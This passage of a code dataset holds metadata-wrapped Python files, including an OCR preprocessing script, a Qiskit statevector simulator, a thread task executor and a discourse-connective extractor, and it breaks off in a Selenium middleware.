-annotators tokenize,ssplit,pos,lemma,ner,parse,dcoref -file nlp.txt\n\"\"\"\n# coding: utf-8\n#from collections import defaultdict\nimport re\n\n\nwith open('nlp.txt.xml', 'r') as fxml:\n for line in fxml:\n m = re.search(r'(.*?)',line)\n if m:\n print(m.group(1))\n\n\n\n\n'''\nimport xml.etree.ElementTree as ET\n\nxml_root=ET.parse('nlp.txt.xml')\n\nfor word in xml_root.iter('word'):\n\n print(word.text)\n\n'''\n","sub_path":"kohei4/chapter06/knock53.py","file_name":"knock53.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"414013135","text":"#!/Users/chrisst/.virtualenvs/redditmade/bin/python\n\nfrom PIL import Image, ImageFont, ImageDraw \n\n\ndef add_corners(im, rad):\n circle = Image.new('L', (rad * 2, rad * 2), 0)\n draw = ImageDraw.Draw(circle)\n draw.ellipse((0, 0, rad * 2, rad * 2), fill=255)\n alpha = Image.new('L', im.size, 255)\n w, h = im.size\n alpha.paste(circle.crop((0, 0, rad, rad)), (0, 0))\n alpha.paste(circle.crop((0, rad, rad, rad * 2)), (0, h - rad))\n alpha.paste(circle.crop((rad, 0, rad * 2, rad)), (w - rad, 0))\n alpha.paste(circle.crop((rad, rad, rad * 2, rad * 2)), (w - rad, h - rad))\n im.putalpha(alpha)\n im.show()\n return im\n\nfont_location = \"/Library/Fonts/OpenSans-Bold.ttf\"\n\n\n# print img.getpixel((progressXOffset, progressYOffset))\n# img2 = Image.new('RGBA', (350,50), color=img.getpixel((progressXOffset, progressYOffset)))\n#img2.show()\n\ndef build_3x1_ad(image_name=None, shirt_image=None):\n background = Image.open(\"image_templates/ad_small.png\")\n draw = ImageDraw.Draw(background)\n\n mask = Image.open('image_templates/shirt_mask.png')\n shirt = Image.open(shirt_image)\n shirt.thumbnail((250,250), Image.ANTIALIAS)\n mask.thumbnail((250,250), 
Image.ANTIALIAS)\n\n background.paste(shirt, mask=mask, box=(123,-29))\n\n image_path = 'compiled_templates/' + image_name\n background.save(image_path)\n # background.show()\n\n return image_path\n\ndef build_rectangle_ad(image_name=None, subreddit=None, shirt_image=None):\n background = Image.open(\"image_templates/med_rect.png\").convert('RGB')\n draw = ImageDraw.Draw(background, 'RGBA')\n image_path = 'compiled_templates/' + image_name \n\n #Image mask must be the correct mode! ie: '1' or 'L'\n mask = Image.open('image_templates/shirt_mask.png')\n shirt = Image.open(shirt_image)\n #resize with thumbnail\n shirt.thumbnail((350,250), Image.ANTIALIAS)\n mask.thumbnail((350,250), Image.ANTIALIAS)\n\n shirt_offset_x = (background.size[0]-shirt.size[0]) / 2\n background.paste(shirt, mask=mask, box=(shirt_offset_x,28))\n \n font = ImageFont.truetype(font_location, 14)\n text_offset_x = (background.size[0]-font.getsize('/r/'+subreddit)[0]) / 2\n draw.text((text_offset_x, 38), '/r/'+subreddit, (0,0,0), font=font)\n\n #Add a white transparent bar\n draw.rectangle([(0,200), (300,250)], fill=(255, 255, 255, 150))\n \n # background.show()\n background.save(image_path)\n\n return image_path\n\ndef update_progress(image_name=None, text_offset=(0,0), text=\"\", bar_offset=(0,0), bar_size=(0,0), percent=0, goal=0):\n img = Image.open('compiled_templates/' + image_name)\n write_progress_text(img, text_offset, text)\n draw_progess_bar(img, bar_offset, bar_size, percent)\n\n img.save('final_images/' + image_name)\n return 'final_images/' + image_name\n\ndef write_progress_text(image, offset, text):\n draw = ImageDraw.Draw(image)\n font = ImageFont.truetype(font_location, 12)\n draw.text(offset, text, (0,0,0), font=font)\n\n return image\n\ndef draw_progess_bar(image, offset, size, percent):\n #TODO if image is missing, make it.\n \n draw = ImageDraw.Draw(image)\n\n draw.rectangle([(offset[0]-1, offset[1]-1), ((offset[0]+size[0])+1, offset[1]+size[1]+1)],\n fill='white', outline=(177,177,177))\n draw.rectangle([(offset[0], offset[1]), (offset[0]+(size[0]*percent), \n offset[1]+size[1])], fill=(176,222,88))\n\n image.show()\n return image\n\n#img = add_corners(img, 10)\n\n\n","sub_path":"image_builder/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"427678981","text":"__author__ = 'Thomas'\n\nfrom flask import Flask, render_template, redirect, url_for, request, session, flash\nfrom functools import wraps\napp = Flask(__name__)\n\n\n@app.route(\"/\", methods=['GET', 'POST'])\ndef index():\n if request.method == \"POST\":\n tableList = request.form['tables']\n print(tableList);\n# return redirect(url_for('.products', tables=tableList))\n return render_template(\"index.html\")\n\n@app.route(\"/products\", methods=['GET', 'POST'])\ndef products():\n return render_template(\"products.html\");\n\nif __name__ == \"__main__\":\n app.run(debug=True)","sub_path":"Flask/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"389196039","text":"import numpy as np\r\nimport os\r\nimport cv2\r\nimport glob\r\nimport shutil\r\nimport pytesseract\r\nimport re\r\nimport time\r\nimport argparse\r\nfrom statistics import mode\r\nfrom pdf2image import convert_from_path\r\n\r\noutput_dir = \"D:\\\\test\"\r\n\r\ndef apply_threshold(img, argument):\r\n switcher = {\r\n 1: 
cv2.threshold(cv2.GaussianBlur(img, (9, 9), 0), 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)[1],\r\n 2: cv2.threshold(cv2.GaussianBlur(img, (7, 7), 0), 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)[1],\r\n 3: cv2.threshold(cv2.GaussianBlur(img, (5, 5), 0), 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)[1],\r\n 4: cv2.threshold(cv2.medianBlur(img, 5), 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)[1],\r\n 5: cv2.threshold(cv2.medianBlur(img, 3), 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)[1],\r\n 6: cv2.adaptiveThreshold(cv2.GaussianBlur(img, (5, 5), 0), 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 31, 2),\r\n 7: cv2.adaptiveThreshold(cv2.medianBlur(img, 3), 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 31, 2),\r\n }\r\n return switcher.get(argument, \"Invalid method\")\r\n\r\ndef get_string(img_path, method):\r\n # Read image using opencv\r\n img = cv2.imread(img_path)\r\n\r\n # Extract the file name without the file extension\r\n file_name = os.path.basename(img_path).split('.')[0]\r\n file_name = file_name.split()[0]\r\n if 'pdf' in img_path:\r\n \tpages = convert_from_path(img_path, 500)\r\n \tpage = pages[0]\r\n \tpage.save('test.png', 'PNG')\r\n \timg = cv2.imread('test.png')\r\n\r\n # Create a directory for outputs\r\n output_path = os.path.join(output_dir, file_name)\r\n if not os.path.exists(output_path):\r\n os.makedirs(output_path)\r\n # Rescale the image, if needed.\r\n img = cv2.resize(img, None, fx=1.5, fy=1.5, interpolation=cv2.INTER_CUBIC)\r\n # Convert to gray\r\n img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n\r\n # Apply dilation and erosion to remove some noise\r\n #kernel = np.ones((1, 1), np.uint8)\r\n #img = cv2.dilate(img, kernel, iterations=1)\r\n #img = cv2.erode(img, kernel, iterations=1)\r\n\r\n # Apply blur to smooth out the edges\r\n #img = cv2.GaussianBlur(img, (5, 5), 0)\r\n\r\n # Apply threshold to get image with only b&w (binarization)\r\n img = cv2.threshold(img, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)[1]\r\n\r\n # used for applying histogram equalizaion\r\n if method == 8:\r\n #clahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(8,8))\r\n #img = clahe.apply(img)\r\n img = cv2.equalizeHist(img)\r\n method = 6\r\n \r\n img = apply_threshold(img, method)\r\n # Save the filtered image in the output directory\r\n save_path = os.path.join(output_path, file_name + \"_filter_\" + str(method) + \".jpg\")\r\n cv2.imwrite(save_path, img)\r\n\r\n # Recognize text with tesseract for python\r\n result = pytesseract.image_to_string(img, lang=\"eng\")\r\n return result\r\n\r\nif __name__ == \"__main__\":\r\n\t#img_path = 'C:\\\\Pune_Hyderabad.ETicket-1.png'\r\n\t#img_path = 'C:\\\\Pune_Hyderabad.ETicket.pdf'\r\n\timg_path = 'C:\\\\images\\\\boarding_pass.jpg'\r\n\tfinal = get_string(img_path, 8)\r\n\ttext_file = open(\"D:\\\\test\\\\Output.txt\", \"w\")\r\n\ttext_file.write(final)\r\n\ttext_file.close() \r\n\tprint(\"Successful\")\r\n","sub_path":"codegrind2.0/tess_test.py","file_name":"tess_test.py","file_ext":"py","file_size_in_byte":3237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"402013955","text":"# Copyright 2010 Google Inc.\n# Licensed under the Apache License, Version 2.0\n# http://www.apache.org/licenses/LICENSE-2.0\n\n# Google's Python Class\n# http://code.google.com/edu/languages/google-python-class/\n\n\"\"\" Wordcount exercise\nGoogle's Python class\n\nThe main() below is already defined and complete. It calls print_words()\nand print_top() functions which you write.\n\n1. 
For the --count flag, implement a print_words(filename) function that counts\nhow often each word appears in the text and prints:\nword1 count1\nword2 count2\n...\n\nPrint the above list in order sorted by word (python will sort punctuation to\ncome before letters -- that's fine). Store all the words as lowercase,\nso 'The' and 'the' count as the same word.\n\n2. For the --topcount flag, implement a print_top(filename) which is similar\nto print_words() but which prints just the top 20 most common words sorted\nso the most common word is first, then the next most common, and so on.\n\nUse str.split() (no arguments) to split on all whitespace.\n\nWorkflow: don't build the whole program at once. Get it to an intermediate\nmilestone and print your data structure and sys.exit(0).\nWhen that's working, try for the next milestone.\n\nOptional: define a helper function to avoid code duplication inside\nprint_words() and print_top(). \"\"\"\n\nfrom collections import Counter\nfrom sys import argv, exit\n\n\ndef count_words(filename):\n with open(filename, 'r') as f:\n return Counter(a.lower() for a in f.read().split())\n\n\ndef print_words(filename):\n [print('{:<37} {:>10}'.format(word, cnt))\n for word, cnt in sorted(count_words(filename).items())]\n\n\ndef print_top(filename):\n [print('{:<6} {:>10}'.format(word, cnt))\n for word, cnt in count_words(filename).most_common(20)]\n\n\ndef main():\n if len(argv) != 3:\n print('usage: ./wordcount.py {--count | --topcount} file')\n exit(1)\n\n option = argv[1]\n filename = argv[2]\n if option == '--count':\n print_words(filename)\n exit(0)\n elif option == '--topcount':\n print_top(filename)\n exit(0)\n else:\n print('unknown option: ' + option)\n exit(1)\n\nif __name__ == '__main__':\n main()\n","sub_path":"basic/wordcount.py","file_name":"wordcount.py","file_ext":"py","file_size_in_byte":2175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"160397855","text":"# -*- coding: utf-8 -*-\n\n# Copyright 2017, IBM.\n#\n# This source code is licensed under the Apache License, Version 2.0 found in\n# the LICENSE.txt file in the root directory of this source tree.\n\n# pylint: disable=invalid-name\n\n\"\"\"Contains a (slow) python statevector simulator.\n\nIt simulates the statevector through a quantum circuit. 
It is exponential in\nthe number of qubits.\n\nWe advise using the c++ simulator or online simulator for larger size systems.\n\nThe input is a qobj dictionary and the output is a Result object.\n\nThe input qobj to this simulator has no shots, no measures, no reset, no noise.\n\"\"\"\nimport logging\n\nfrom qiskit.backends.local.localjob import LocalJob\nfrom qiskit.backends.local._simulatorerror import SimulatorError\nfrom qiskit.qobj import QobjInstruction\nfrom .qasm_simulator_py import QasmSimulatorPy\n\nlogger = logging.getLogger(__name__)\n\n\nclass StatevectorSimulatorPy(QasmSimulatorPy):\n \"\"\"Python statevector simulator.\"\"\"\n\n DEFAULT_CONFIGURATION = {\n 'name': 'local_statevector_simulator_py',\n 'url': 'https://github.com/QISKit/qiskit-terra',\n 'simulator': True,\n 'local': True,\n 'description': 'A Python statevector simulator for qobj files',\n 'coupling_map': 'all-to-all',\n 'basis_gates': 'u1,u2,u3,cx,id,snapshot'\n }\n\n def __init__(self, configuration=None):\n super().__init__(configuration or self.DEFAULT_CONFIGURATION.copy())\n\n def run(self, qobj):\n \"\"\"Run qobj asynchronously.\n\n Args:\n qobj (dict): job description\n\n Returns:\n LocalJob: derived from BaseJob\n \"\"\"\n local_job = LocalJob(self._run_job, qobj)\n local_job.submit()\n return local_job\n\n def _run_job(self, qobj):\n \"\"\"Run a Qobj on the backend.\"\"\"\n self._validate(qobj)\n final_state_key = 32767 # Internal key for final state snapshot\n # Add final snapshots to circuits\n for experiment in qobj.experiments:\n experiment.instructions.append(\n QobjInstruction(name='snapshot', params=[final_state_key])\n )\n result = super()._run_job(qobj)\n # Replace backend name with current backend\n result.backend_name = self.name\n # Extract final state snapshot and move to 'statevector' data field\n for experiment_result in result.results.values():\n snapshots = experiment_result.snapshots\n if str(final_state_key) in snapshots:\n final_state_key = str(final_state_key)\n # Pop off final snapshot added above\n final_state = snapshots.pop(final_state_key, None)\n final_state = final_state['statevector'][0]\n # Add final state to results data\n experiment_result.data['statevector'] = final_state\n # Remove snapshot dict if empty\n if snapshots == {}:\n experiment_result.data.pop('snapshots', None)\n return result\n\n def _validate(self, qobj):\n \"\"\"Semantic validations of the qobj which cannot be done via schemas.\n Some of these may later move to backend schemas.\n\n 1. No shots\n 2. No measurements in the middle\n \"\"\"\n if qobj.config.shots != 1:\n logger.info(\"statevector simulator only supports 1 shot. \"\n \"Setting shots=1.\")\n qobj.config.shots = 1\n for experiment in qobj.experiments:\n if getattr(experiment.config, 'shots', 1) != 1:\n logger.info(\"statevector simulator only supports 1 shot. 
\"\n \"Setting shots=1 for circuit %s.\", experiment.name)\n experiment.config.shots = 1\n for op in experiment.instructions:\n if op.name in ['measure', 'reset']:\n raise SimulatorError(\n \"In circuit {}: statevector simulator does not support \"\n \"measure or reset.\".format(experiment.header.name))\n","sub_path":"qiskit/backends/local/statevector_simulator_py.py","file_name":"statevector_simulator_py.py","file_ext":"py","file_size_in_byte":4005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"123893945","text":"#!/usr/bin/env python\n\nimport logging\nimport threading\nfrom queue import Queue\n\nclass Task(object):\n def __init__(self, taskid, func, *args):\n self.logger = logging.getLogger('task_executor')\n self.func = func\n self.args = args\n self.taskid = taskid\n\n def execute(self, local_data):\n args = ()\n args += (local_data, )\n args += self.args\n try:\n self.func(*args)\n except Exception as e:\n self.logger.exception(e)\n\n\nclass TaskExecutor(object):\n def __init__(self, idx):\n self.local_data = dict()\n self.queue = Queue()\n self.empty = threading.Event()\n self.empty.set()\n self.running = True\n self.thread = threading.Thread(target=self.loop, args=())\n self.thread.name = 'worker-{}'.format(idx)\n self.thread.start()\n\n def submit(self, task):\n self.empty.clear()\n self.queue.put(task)\n\n def loop(self):\n while self.running:\n task = self.queue.get()\n task.execute(self.local_data)\n while not self.queue.empty():\n task = self.queue.get()\n task.execute(self.local_data)\n self.empty.set()\n\n def join(self):\n self.thread.join()\n\n def _shutdown(self, local_data):\n self.running = False\n hook = local_data.get('exit_hook')\n if hook is not None:\n hook(self.local_data)\n\n def shutdown(self):\n task = Task(0, self._shutdown)\n self.submit(task)\n\n def wait(self):\n self.empty.wait()\n\nclass TaskExecutorService(object):\n def __init__(self, max_workers):\n self.max_workers = max_workers\n self.workers = []\n for i in range(0, self.max_workers):\n self.workers.append(TaskExecutor(i))\n\n def submit(self, task):\n worker = self.workers[task.taskid % self.max_workers]\n worker.submit(task)\n\n def shutdown(self):\n for worker in self.workers:\n worker.shutdown()\n\n def wait(self, taskid):\n worker = self.workers[taskid % self.max_workers]\n worker.wait()\n","sub_path":"oxfs/task_executor.py","file_name":"task_executor.py","file_ext":"py","file_size_in_byte":2137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"429603127","text":"from functools import lru_cache\n\nclass Solution:\n def mincostTickets(self, days: List[int], costs: List[int]) -> int:\n \n duration = [1,7,30]\n dayset = set(days)\n \n @lru_cache(None)\n def dp(i):\n if i>365:\n return 0\n elif i in dayset:\n return min(dp(i+d)+c for c,d in zip(costs, duration))\n else:\n return dp(i+1)\n \n return dp(1)","sub_path":"983_minCost_tickets.py","file_name":"983_minCost_tickets.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"308152025","text":"a = eval(input('Please enter the frequency of the radiation: '))\r\nb = [3 * 10**9, 3 * 10**12, 4.3 * 10**14, 7.5 * 10**14, 3 * 10**17, 3 * 10**19]\r\nc = ['radio waves', 'microwaves', 'infrared light', 'visible light', 'ultraviolet light', 'x-rays', 'gamma rays']\r\nif a >= 3 * 10**19:\r\n d = 'gamma rays'\r\nfor i in range(6):\r\n if a < b[i]:\r\n d = 
c[i]\r\n break\r\nprint(d)\r\n ","sub_path":"055.py","file_name":"055.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"625621847","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Feb 14 15:19:16 2020\n\n@author: ida\n\"\"\"\n\nimport pandas as pd\nimport json\nimport spacy\nimport re\nimport os\nfrom string import punctuation\n\n#give the pattern of each explicit word\nen_dependency_patterns = {\n # S2 ~ S2 head (full S head) ---> connective\n \"after\": [\n {\"S1\": \"advcl\", \"S2\": \"mark\", \"POS\": \"IN\"},\n {\"S1\": \"acl\", \"S2\": \"mark\", \"POS\": \"IN\"},\n ],\n \"also\": [\n {\"S1\": \"advcl\", \"S2\": \"advmod\", \"POS\": \"RB\"},\n ],\n \"although\": [\n {\"S1\": \"advcl\", \"S2\": \"mark\", \"POS\": \"IN\"},\n ],\n \"and\": [\n {\"S1\": \"conj\", \"S2\": \"cc\", \"POS\": \"CC\", \"flip\": True},\n ],\n \"as\": [\n {\"S1\": \"advcl\", \"S2\": \"mark\", \"POS\": \"IN\"},\n ],\n \"before\": [\n {\"S1\": \"advcl\", \"S2\": \"mark\", \"POS\": \"IN\"},\n ],\n \"but\": [\n {\"S1\": \"conj\", \"S2\": \"cc\", \"POS\": \"CC\", \"flip\": True},\n ],\n \"so\": [\n # {\"S1\": \"parataxis\", \"S2\": \"dep\", \"POS\": \"IN\", \"flip\": True},\n {\"S1\": \"advcl\", \"S2\": \"mark\", \"POS\": \"IN\"},\n {\"S1\": \"advcl\", \"S2\": \"mark\", \"POS\": \"RB\"},\n ],\n \"still\": [\n {\"S1\": \"parataxis\", \"S2\": \"advmod\", \"POS\": \"RB\", \"acceptable_order\": \"S1 S2\"},\n {\"S1\": \"dep\", \"S2\": \"advmod\", \"POS\": \"RB\", \"acceptable_order\": \"S1 S2\"},\n ],\n \"though\": [\n {\"S1\": \"advcl\", \"S2\": \"mark\", \"POS\": \"IN\"},\n ],\n \"because\": [\n {\"S1\": \"advcl\", \"S2\": \"mark\", \"POS\": \"IN\"},\n ],\n \"however\": [\n {\"S1\": \"parataxis\", \"S2\": \"advmod\", \"POS\": \"RB\"},\n # {\"S1\": \"ccomp\", \"S2\": \"advmod\", \"POS\": \"RB\"}, ## rejecting in favor of high precision\n ],\n \"if\": [\n {\"S1\": \"advcl\", \"S2\": \"mark\", \"POS\": \"IN\"},\n ],\n \"meanwhile\": [\n {\"S1\": \"parataxis\", \"S2\": \"advmod\", \"POS\": \"RB\"},\n ],\n \"while\": [\n {\"S1\": \"advcl\", \"S2\": \"mark\", \"POS\": \"IN\"},\n ],\n \"for example\": [\n {\"S1\": \"parataxis\", \"S2\": \"nmod\", \"POS\": \"NN\", \"head\": \"example\"},\n ],\n \"then\": [\n {\"S1\": \"parataxis\", \"S2\": \"advmod\", \"POS\": \"RB\", \"acceptable_order\": \"S1 S2\"},\n ],\n \"when\": [\n {\"S1\": \"advcl\", \"S2\": \"advmod\", \"POS\": \"WRB\"},\n ],\n}\n\n\ndef extract_pattern(dependency_patterns):\n patterns = []\n conn = []\n for each_conj in dependency_patterns:\n for each_pattern in dependency_patterns[each_conj]:\n# try:\n# if each_pattern['flip']==True:\n# patterns.append([each_conj, each_pattern['S1'], each_pattern['S2'], each_pattern['POS']])\n# conn.append(each_conj)\n# except:\n patterns.append([each_conj, each_pattern['S2'], each_pattern['S1'], each_pattern['POS']])\n conn.append(each_conj)\n return patterns, conn\n\ndef run_syntactic(filepath):\n patterns, conn = extract_pattern(en_dependency_patterns)\n conn.append('for')\n \n pred_df = pd.DataFrame(columns=['Offset-raw', 'filename', 'ConnSpanList'])\n all_connectives = []\n for filename in os.listdir(filepath):\n# print(filename)\n# all_connectives = []\n json_path = filepath + filename + '/pdtb-parses.json'\n with open(json_path) as f:\n f_input = json.load(f)\n for sent in f_input[filename]['sentences']:\n temp_dict = {}\n for word in sent['dependencies']:\n temp_dict[word[2]] = {'dep':word[0], 
'head':word[1], 'pos':sent['words'][int(word[2].split(\"-\")[-1])-1][1]['PartOfSpeech'], \n 'begin': sent['words'][int(word[2].split(\"-\")[-1])-1][1]['CharacterOffsetBegin'], \n 'end': sent['words'][int(word[2].split(\"-\")[-1])-1][1]['CharacterOffsetEnd']}\n \n for word in temp_dict:\n norm_word = ' '.join(word.split('-')[:-1]).lower()\n if norm_word in conn: \n if temp_dict[word]['head'] != 'ROOT-0':\n pattern = []\n if norm_word == 'for':\n if temp_dict[word]['head'] == 'example':\n pattern = ['for example', temp_dict[word]['dep'].split(\":\")[0], temp_dict[temp_dict[word]['head']]['dep'].split(\":\")[0], temp_dict[word]['pos']]\n if pattern not in all_connectives:\n all_connectives.append(pattern)\n else:\n pattern = [norm_word, temp_dict[word]['dep'].split(\":\")[0], temp_dict[temp_dict[word]['head']]['dep'].split(\":\")[0], temp_dict[word]['pos']]\n if pattern not in all_connectives:\n all_connectives.append(pattern)\n# try:\n# if pattern[0] == 'and':\n# print(\">>>AND\")\n# if pattern in patterns:\n# print(\"YES!\")\n# except:\n# pass\n if pattern in patterns:\n# if pattern[0] == 'and':\n# print(\"UYEEEE\")\n## print(pattern)\n word_span = str(temp_dict[word]['begin']) + '..' + str(temp_dict[word]['end'])\n pred_df = pred_df.append({'Offset-raw':norm_word, \n 'filename':filename, \n 'ConnSpanList': word_span}, ignore_index=True)\n else:\n pattern = [norm_word, temp_dict[word]['dep'].split(\":\")[0], 'root', temp_dict[word]['pos']]\n if pattern not in all_connectives:\n all_connectives.append(pattern)\n \n pd_all_connectives = pd.DataFrame(all_connectives, columns = ['conn', 'dep-1', 'dep-2', 'POS']).sort_values(by=['conn'])\n print('Finish the extraction')\n return pred_df, pd_all_connectives\n#%%\ndef evaluate(gold_df, pred_df):\n print('Evaluating result...')\n ##choose pred that the connective are covered by the syntactic parser only \n slicing_gold_idx = []\n for i in gold_df.index:\n if gold_df.loc[i]['Offset-raw'] in en_dependency_patterns.keys():\n slicing_gold_idx.append(i)\n \n pred = pred_df.values.tolist()\n new_gold = gold_df.loc[slicing_gold_idx]\n gold = new_gold.values.tolist()\n tp = [value for value in gold if value in pred]\n fn = [value for value in gold if value not in pred]\n fp = [value for value in pred if value not in gold]\n \n prec = len(tp)/len(pred)\n rec = len(tp)/len(gold)\n print(\"true positive\\t: \", len(tp))\n print(\"false negative\\t: \", len(fn))\n print(\"false positive\\t: \", len(fp))\n print('Precision\\t: ', prec)\n print('Recall\\t\\t: ', rec)\n print('F1 score \\t: ', 2*prec*rec/(prec+rec))\n \n tpdf = pd.DataFrame(tp, columns=['Offset-raw', 'filename', 'ConnSpanList'])\n \n return new_gold, tpdf\n#%%\ndef extract_spice_pred(pred_df):\n nlp = spacy.load(\"en\")\n raw_path = \"../../data/SPICE/raw/\"\n \n all_pred = pd.DataFrame()\n for each_file in pred_df['filename'].unique():\n# print(each_file)\n raw_file_path = raw_path + each_file + '.txt'\n pred_file = pred_df[pred_df['filename']==each_file]\n pred_file['start'] = [int(x.split(\"..\")[0]) for x in pred_file['ConnSpanList']]\n pred_file = pred_file.sort_values(['start']).reset_index()\n f_string = open(raw_file_path, 'r', encoding=\"utf-8\", errors=\"ignore\").read()\n doc = nlp(f_string)\n \n docs = [sent for sent in doc.sents]\n results = []\n doc_pivot = 0\n pred_pivot = 0\n while pred_pivot != len(pred_file):\n if (len(doc[:docs[doc_pivot].end].text) > pred_file.loc[pred_pivot]['start']):\n results.append(docs[doc_pivot].text)\n pred_pivot += 1\n else:\n doc_pivot += 1\n 
pred_file['fullSent'] = results\n all_pred = all_pred.append(pred_file, ignore_index=True)\n return all_pred\n \n#%%\ndef evaluate_spice(gold_df, pred_conn):\n\n print('Evaluating result...')\n \n #choose pred that the connective are covered by the syntactic parser only \n slicing_gold_idx = []\n for i in gold_df.index:\n# print(gold_df.loc[i]['conn'])\n if gold_df.loc[i]['Offset-raw'].lower().strip() in en_dependency_patterns.keys():\n slicing_gold_idx.append(i)\n \n gold_df = gold_df.loc[slicing_gold_idx]\n \n pred_conn = extract_spice_pred(pred_conn)\n \n pred_dict = {}\n for i in range(len(pred_conn)):\n filename = pred_conn.loc[i][\"filename\"]\n conn = pred_conn.loc[i][\"Offset-raw\"].lower().strip()\n fullSent = pred_conn.loc[i][\"fullSent\"].lower().strip(punctuation).strip()\n if filename not in pred_dict:\n pred_dict[filename] = {}\n pred_dict[filename][conn] = [fullSent]\n elif conn not in pred_dict[filename]:\n pred_dict[filename][conn] = [fullSent]\n else:\n pred_dict[filename][conn].append(fullSent)\n\n #create dictionary from the gold:\n gold_dict = {}\n for i in gold_df.index:\n filename = gold_df.loc[i]['filename']\n conn = gold_df.loc[i]['Offset-raw'].lower().strip()\n fullSent = gold_df.loc[i]['fullSent'].lower().strip(punctuation).strip()\n if filename not in gold_dict:\n gold_dict[filename] = {}\n gold_dict[filename][conn] = [fullSent]\n elif conn not in gold_dict[filename]:\n gold_dict[filename][conn] = [fullSent]\n else:\n gold_dict[filename][conn].append(fullSent)\n\n match_connective = []\n i = 0\n not_found = []\n for filename in gold_dict: \n for conn in gold_dict[filename]:\n for gold_sent in gold_dict[filename][conn]:\n found = False\n if filename in pred_dict:\n if conn in pred_dict[filename]:\n for pred_sent in pred_dict[filename][conn]:\n if (pred_sent in gold_sent or pred_sent in gold_sent):\n match_connective.append([filename, conn, pred_sent])\n found = True\n break\n if found == False:\n not_found.append(conn)\n i+=1\n# if i%100 == 0:\n# print(i) \n \n prec = len(match_connective)/len(pred_conn)\n rec = len(match_connective)/len(gold_df)\n print(\"precision\\t: \", prec)\n print(\"recall\\t: \" , rec)\n print(\"f1-score\\t: \", 2*prec*rec/(prec+rec))\n \n tpdf = pd.DataFrame(match_connective, columns=['filename', 'Offset-raw', 'fullSent'])\n \n return gold_df, tpdf, pred_conn\n \n#%%\nif __name__ == \"__main__\":\n \n patterns, conns = extract_pattern(en_dependency_patterns)\n \n print('Evaluate ted...')\n ted_filepath = '../../data/Ted-Talk/new_conll2015/'\n ted_gold = pd.read_csv('../../result-csv/ted_gold_shifted.csv')\n ted_gold['Offset-raw'] = ted_gold['Offset-raw'].str.lower()\n pred_ted, conn_ted = run_syntactic(ted_filepath)\n new_gold_ted, tp_ted = evaluate(ted_gold, pred_ted)\n# \n# print('Evaluated biodrb...')\n# biodrb_filepath = '../../data/BioDRB/input_biodrb_conll2015/'\n# biodrb_gold = pd.read_csv('../../result-csv/biodrb_gold.csv')\n# biodrb_gold['Offset-raw'] = biodrb_gold['Offset-raw'].str.lower()\n# biodrb_gold['filename'] = biodrb_gold['filename'].apply(str)\n# pred_biodrb, conn_biodrb = run_syntactic(biodrb_filepath)\n# new_gold_biodrb, tp_biodrb = evaluate(biodrb_gold, pred_biodrb)\n# \n# print('Evaluate wsj 23...')\n# wsj_filepath = '../../data/wsj_23/wsj_23_conll2015/conll2015/'\n# wsj_gold = pd.read_csv('../../result-csv/wsj_23_gold.csv')\n# wsj_gold['Offset-raw'] = wsj_gold['Offset-raw'].str.lower()\n# pred_wsj, conn_wsj = run_syntactic(wsj_filepath)\n# new_gold_wsj, tp_wsj = evaluate(wsj_gold, pred_wsj)\n#\n# print('Evaluate 
spice...')\n# spice_filepath = '../../data/SPICE/conll2015/'\n# pred_spice, conn_spice = run_syntactic(spice_filepath)\n# spice_gold = pd.read_csv(\"../../result-csv/spice_gold.csv\")\n# new_gold, tp_spice, pred_spice = evaluate_spice(spice_gold, pred_spice)\n# \n# %%\n# not_found_files = ['talk_2009_en', 'talk_1978_en']\n# \n# new_gold = []\n# for i in ted_gold.index:\n# conn = ted_gold.loc[i]['Offset-raw']\n# span = ted_gold.loc[i]['ConnSpanList']\n# file = ted_gold.loc[i]['filename']\n# if file not in not_found_files:\n# new_span = str(int(span.split(\"..\")[0])-1) + \"..\" + str(int(span.split(\"..\")[1])-1)\n# new_gold.append([conn, file, new_span])\n# else:\n# new_gold.append([conn, file, span])\n# \n# df = pd.DataFrame(new_gold, columns = ['Offset-raw', 'filename', 'ConnSpanList'])","sub_path":"code/syntactic/syntactic_coreNLP.py","file_name":"syntactic_coreNLP.py","file_ext":"py","file_size_in_byte":12855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"401957179","text":"#coding:utf-8\n\nfrom selenium import webdriver\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom scrapy.http import HtmlResponse\nfrom logging import getLogger\n\nclass SeleniumMiddleware(object):\n\n    def __init__(self, timeout=None, service_args=[]):\n        self.logger = getLogger(__name__)\n        self.timeout = timeout\n        chrome_options = webdriver.ChromeOptions()\n        chrome_options.add_argument('--headless')\n        chrome_options.add_argument('--disable-gpu')\n        self.browser = 